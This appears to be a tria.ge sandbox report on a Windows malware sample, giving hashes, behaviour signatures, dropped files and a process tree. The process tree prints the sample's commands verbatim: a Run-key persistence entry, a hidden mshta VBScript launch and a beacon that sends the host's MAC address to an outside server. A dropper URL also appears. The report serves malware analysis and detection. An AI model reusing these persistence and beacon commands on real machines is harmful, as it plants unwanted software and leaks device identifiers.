Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

17b739e302...18.exe

windows7-x64

10

17b739e302...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/06/2024, 22:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    17b739e3023ebe3b9a31e1d8e437ce2e_JaffaCakes118.exe

  • Size

    43KB

  • MD5

    17b739e3023ebe3b9a31e1d8e437ce2e

  • SHA1

    0544351944103cd293586513939ae87447318011

  • SHA256

    862c3744f321557142a17753624cf29762861e9ec65cc9ceec79a1edde93dd1e

  • SHA512

    09035361acc60636b2a58bbc0967c9565217787c3a8917e09960849ad25f19107e36efdab5727513f96e8459d91f36e5fa2476fabd3b49ac7c2657b2d07f6fe1

  • SSDEEP

    768:edK9PrqC1lSQ1l3rc4GpOIes5efLvDDe/3Za80rgqNdAAoRhmwRh/E12:eMtGVQn3YuIZ8fTDD6YVrgkdAAoR7b/3

Score
10/10
persistenceupx

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://chaliang.115ku.cn/8348/yahooo.htm%22,0%29%28window.close%29

Signatures

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
    adwarespyware
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\17b739e3023ebe3b9a31e1d8e437ce2e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\17b739e3023ebe3b9a31e1d8e437ce2e_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3312
    • C:\Users\Admin\AppData\Local\Temp\IEXPIORE.exe
      "C:\Users\Admin\AppData\Local\Temp\IEXPIORE.exe"
      2⤵
      • Executes dropped EXE
      PID:3700
    • C:\Users\Admin\AppData\Local\Temp\8348.exe
      "C:\Users\Admin\AppData\Local\Temp\8348.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:836
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\internet.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\internet.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4792
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\240602937.bat
          4⤵
          • Checks computer location settings
          • Drops file in Windows directory
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3040
          • C:\Windows\SysWOW64\reg.exe
            reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d C:\Windows\help\runauto.vbs /f
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:4768
          • C:\Windows\SysWOW64\regedit.exe
            Regedit /s tem.reg
            5⤵
            • Modifies registry class
            • Runs .reg file with regedit
            PID:2728
          • C:\Windows\SysWOW64\regedit.exe
            Regedit /s gai.reg
            5⤵
            • Runs .reg file with regedit
            PID:984
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /all|findstr /c:"Physical Address"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:336
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              6⤵
              • Gathers network information
              PID:952
            • C:\Windows\SysWOW64\findstr.exe
              findstr /c:"Physical Address"
              6⤵
                PID:1740
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Windows\help\r.vbs"
              5⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:1564
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" http://chaliang.115ku.cn/8348/count.asp?mac= DA:D5:86:92:AE:8D&os=Windows_NT&ver=20090628
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2408
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2408 CREDAT:17410 /prefetch:2
                  7⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2956
            • C:\Windows\SysWOW64\mshta.exe
              mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://chaliang.115ku.cn/8348/yahooo.htm",0)(window.close)
              5⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4308
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" http://chaliang.115ku.cn/8348/yahooo.htm
                6⤵
                • Modifies Internet Explorer settings
                PID:3088
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\svchost.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\svchost.exe
          3⤵
          • Executes dropped EXE
          PID:4800

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      Filesize

      471B

      MD5

      fa34ecb8815a2d98849888cb1cdbf38b

      SHA1

      84fd0e04586009efb3683c98da8d9aa41487cd42

      SHA256

      5077a54924f80491a74ed78bbd73ff7bf85a27caddb80ceaa9ccb86f8b9a11be

      SHA512

      ccfdb76ccedd0076601e17272d346229e2b9c0dd884c09bb7701b32c5dc177da8a91bb539ce751297d8ea44716fc497e8a337a9499c93a474ba85915f28f1053

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      Filesize

      404B

      MD5

      80bb557ae2fba228b9db04493d5e2e87

      SHA1

      829fd8fd1d0c118f66c9a84bf9b8bd9289bc5ae0

      SHA256

      a91b77f3d7921dcac80a8441803cf8ce9ec85518f106c42f37f382bc242798f7

      SHA512

      89dce8e421544cf99244b58f8751c4ab146399564abf8c10b8d6460befe1bbc11fe5bf03a1adb6438a29603b850e90a315e7478b95c0a33f387775995c011322

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\D5DFSS0T\suggestions[1].en-US
      Filesize

      17KB

      MD5

      5a34cb996293fde2cb7a4ac89587393a

      SHA1

      3c96c993500690d1a77873cd62bc639b3a10653f

      SHA256

      c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

      SHA512

      e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\240602937.bat
      Filesize

      3KB

      MD5

      732ab4272e1d81e491378ed8014678f2

      SHA1

      83a4aade139bb3bfd8c58332b16351d20a0b882e

      SHA256

      67a89edc9dd6a85d35c848aa04b071a15c92b41f8656c272a001d49d1ccb2bfb

      SHA512

      74f9073c5b2d35be2c8ba6bb8181b54782c323fa2a1e4bd7013a545b6d0833a7d3164de0593d2e9028f8e71f27a6734b87d6625c2de04ca531ef6b5d7d327366

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\8348.exe
      Filesize

      36KB

      MD5

      d129bc91bc82c948ad89edbf43a43eb5

      SHA1

      3cf3748966656a0cc6628f0be6cb5c45f34c4b24

      SHA256

      84818195c5e187861114e61a85bee708e32eede232f77cc158bc00d80c90fffa

      SHA512

      879446f4e77316c3e89989e5743674e4f298f3e69a04dd3ee8a45e7666484cce19aa129e7ba0f9f9508acedbcc295789413f07acbeeab3fd92f321792db5eb70

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IEXPIORE.exe
      Filesize

      5KB

      MD5

      d2557a0dc0b41d134d0a3509ae5984f6

      SHA1

      02e1c3d28285ef6c8d0e52a3822ee167907ed632

      SHA256

      1fb3511eb8673b13571e50fc8a68aed186e98cb2683c02c8b58e69153a8e1f27

      SHA512

      24b95b4f0fe65680b524d150148093aed7c2083838a95b4222ea4b0d44df7c1a0c422a1884b450d58a60a765d9940aded125fd26622c85968b05b4851787e06e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gai.reg
      Filesize

      309B

      MD5

      8c9d7b6c427f4978944db6dcdf2905be

      SHA1

      8fb3eb9e98895a774fdd4f043205a2d7abf75ccd

      SHA256

      b70851b5596fc38203915b7803d6e6b96e2bfc4a99f7181418dc489bf4b290de

      SHA512

      8cfaa804ad8e58c8394d19d9a28b07e81c4ac52d2aaabb1eb1b16a97b6d52a4cda204f0d23557e83f9a1bfd906dec42d9cd8a88433cedd69e833ee9767508897

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\internet.exe
      Filesize

      7KB

      MD5

      9946dc2c22aa9d35818edd2e045c1123

      SHA1

      a1fa1b197800c99642dd8f5f4136e1ef96614247

      SHA256

      7f19486887e1fa5e693046811c281ab8c9693f68cfaea71ee5b45c04d8bfe574

      SHA512

      fffe50e142b7e02248cf3c5b3429e81fecd97c12abe358024f07f9232f0785ae6c0f5b2c25561255bfb8d2f1fce7d5693048934668420426865c3ec45b69fc2b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\svchost.exe
      Filesize

      5KB

      MD5

      022f77313a82a51f5ee19d8114e9e84a

      SHA1

      278e1e6e3a1338032e6aaddf959415acc875c114

      SHA256

      af94466489b80debb57f0498e400c29e79b36f710afdfee4211d7fa800d42610

      SHA512

      25373e6008118ec5c467ce94dd73ab8689706721dfa6af28100b7d1c2ccb5d04b55d81e578461a0b88f0c0a60284ee85e678d1dc9f356b108e0fac9422e6cf41

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tem.reg
      Filesize

      222B

      MD5

      777b3013806ebbd7fca1a749363b5ffd

      SHA1

      51b98f06e509f0eda410e9a51afd7ee6979e48bd

      SHA256

      1da53c458c9eee1572fb6319634ac420bc2b1aa8e98555e2e4fcba1087a9bc85

      SHA512

      c819da2fc50f008d84ba4dd75ed3a11b9ce76795886020bab4d08f13a89c57e528f2dd9d66f50800f3f42844921cf4570ca6d7c1b8d6011c84d489857449274d

      Download Submit

    • C:\Users\Admin\Favorites\115┐ß╡╝║╜ ╔╧═°╛═╔╧115┐ß╡╝║╜.url
      Filesize

      132B

      MD5

      c2c406ed4ce4d739d2a0951ac3b8ff19

      SHA1

      9953592c12233455312ca076ae3915ce259e1883

      SHA256

      4177d9420c20bc37957c6725f2d563be794f2a0efe1ed231e6a2970c96e96ad9

      SHA512

      f43e586e20a05045ddcba32469d3746a85d1e8913b0c96063f0a0600f0993080353919b1f30139e7dda42db4b21891e1e12dbff7c010c8b756cd3ae0a11f7260

      Download Submit

    • C:\Windows\help\r.vbs
      Filesize

      139B

      MD5

      78e87f67f6ff8983a73f97bb665fbea7

      SHA1

      d99f3650abb13234d51d7aa3b6002a1e027226f1

      SHA256

      e4c10570c53f3c87f3aa614acd7ce40ff9d55d4fe1b1ff00722e922b2ae71897

      SHA512

      642b9034457e201b2b90dd123a38f6ac21c10d087822b761d6b229f61d39c05c5f4836701d6978b9ed2553b133566617c6a24d3a34d691a642629ca47b39b92c

      Download Submit

    • memory/836-19-0x0000000001000000-0x0000000001017000-memory.dmp

      Filesize

      92KB

      Download

    • memory/836-77-0x0000000001000000-0x0000000001017000-memory.dmp

      Filesize

      92KB

      Download

    • memory/836-79-0x0000000001000000-0x0000000001017000-memory.dmp

      Filesize

      92KB

      Download

    • memory/3312-17-0x0000000000400000-0x000000000040C567-memory.dmp

      Filesize

      49KB

      Download

    • memory/3312-0-0x0000000000400000-0x000000000040C567-memory.dmp

      Filesize

      49KB

      Download

    • memory/3700-10-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4800-71-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

      Download